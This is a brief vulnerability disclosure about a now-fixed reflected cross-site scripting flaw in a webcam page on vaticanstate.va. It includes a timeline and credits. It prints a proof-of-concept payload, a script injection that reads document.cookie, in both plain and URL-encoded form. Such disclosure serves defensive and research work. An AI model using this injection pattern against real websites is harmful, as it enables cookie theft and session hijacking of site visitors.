* vaticanstate.va XSS Vulnerability webcam page
* ========================================================
*
* Site: http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================


Report-Timeline:
----------------
2011-03-07: Notification to vaticanstate.va
2013-06-30: Fixed, but no answer received.


Description:
------------
the vulnerability was in the webcam page "page/index?cam=webcam[0-9]" by sending an
HTTP GET request with the variable "testo" containing Javascript or HTML code.
Example (url-decoded):

http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3&testo=</span></div><script>alert(document.cookie)</script>


XSS URL (now fixed):
--------------------
http://www.vaticanstate.va/IT/Monumenti/webcam/index?cam=webcam3&testo=%3C%2Fspan%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E


Screenshot XSS Vulnerability before fix:
----------------------------------------
http://goo.gl/Jv8XJ


CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)


LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.